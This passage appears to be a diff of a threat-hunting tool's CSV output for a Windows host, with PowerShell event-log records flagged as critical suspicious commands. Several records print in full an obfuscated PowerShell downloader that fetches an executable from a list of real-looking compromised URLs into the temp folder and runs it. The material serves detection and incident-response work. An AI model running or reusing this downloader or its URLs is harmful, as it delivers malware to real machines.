((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Invoke-Item): &quot;Invoke-Item&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""PowerShell"">
+    </Provider>
+    <EventID Qualifiers=""0"">800</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>8</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x80000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-26T05:09:33.505877Z"">
+    </TimeCreated>
+    <EventRecordID>792</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""0"" ThreadID=""0"">
+    </Execution>
+    <Channel>Windows PowerShell</Channel>
+    <Computer>DESKTOP-RIPCLIP</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),	DetailSequence=1 
+	DetailTotal=1 
+ 
+	SequenceNumber=33 
+ 
+	UserId=DESKTOP-RIPCLIP\Clippy 
+	HostName=ConsoleHost 
+	HostVersion=5.1.19041.1 
+	HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 
+	HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+	EngineVersion=5.1.19041.1 
+	RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 
+	PipelineId=6 
+	ScriptName= 
+	CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Invoke-Item): &quot;Invoke-Item&quot; 
+ParameterBinding(Invoke-Item): name=&quot;Path&quot;; value=&quot;C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe&quot; 
+</Data>
+    <Binary></Binary>
+  </EventData>
+</Event>",DESKTOP-RIPCLIP,Windows PowerShell
+Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Item): &quot;New-Item&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""PowerShell"">
+    </Provider>
+    <EventID Qualifiers=""0"">800</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>8</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x80000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-26T05:09:29.083919Z"">
+    </TimeCreated>
+    <EventRecordID>786</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""0"" ThreadID=""0"">
+    </Execution>
+    <Channel>Windows PowerShell</Channel>
+    <Computer>DESKTOP-RIPCLIP</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),	DetailSequence=1 
+	DetailTotal=1 
+ 
+	SequenceNumber=21 
+ 
+	UserId=DESKTOP-RIPCLIP\Clippy 
+	HostName=ConsoleHost 
+	HostVersion=5.1.19041.1 
+	HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 
+	HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+	EngineVersion=5.1.19041.1 
+	RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 
+	PipelineId=6 
+	ScriptName= 
